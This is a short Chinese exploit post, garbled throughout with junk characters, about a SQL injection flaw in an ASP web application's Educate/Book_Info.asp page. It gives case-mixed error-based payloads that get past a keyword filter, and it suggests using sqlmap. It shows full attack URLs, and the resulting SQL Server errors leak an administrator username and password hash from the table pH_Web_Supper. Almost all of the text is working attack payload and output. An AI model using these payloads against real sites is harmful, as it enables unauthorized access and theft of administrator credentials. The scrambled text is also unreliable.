漏洞出现在Educate/Book_Info.asp 1 b! s7 U: U: n( ?
) j- P l( c u' \: D+ e此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
$ t2 |6 Q2 w% H/ T5 j $ t# l% w+ ^0 h
exp:如下
6 m% L1 n$ ^2 Q1 Q查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) U6 K! ?. K9 Z1 }( L6 k
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! Q6 Z8 _% T ^4 D- N6 [
0 ?7 c4 a; d9 [; J! {* ?! D. N9 vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper); D9 F0 h1 f: y/ n1 n
) B0 f5 `) l U3 p$ SMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'. n) o, }, I# W
* ?, t. G. G6 q) r- q2 e1 L
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ K4 v4 K2 {4 S L
. x4 s0 n) ]. [5 X5 f1 E) \/Educate/Book_Info.asp,行 8! ?. _+ k$ F8 D' [$ O8 h
! X# K& ?& x6 ~http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ [# c9 ]( _( G5 O# p1 t7 g- J 8 L6 Z# v/ E* X r! M2 J$ v" ?
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 t% |( p5 J0 a: ?- i) @
. \$ s# N, A% J) m& W. }将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
& r- G- N8 l' j6 ^3 F6 b
2 V7 _6 B; k( y$ c% ^9 ?/Educate/Book_Info.asp,行 8! U0 T* w0 w2 R1 k
|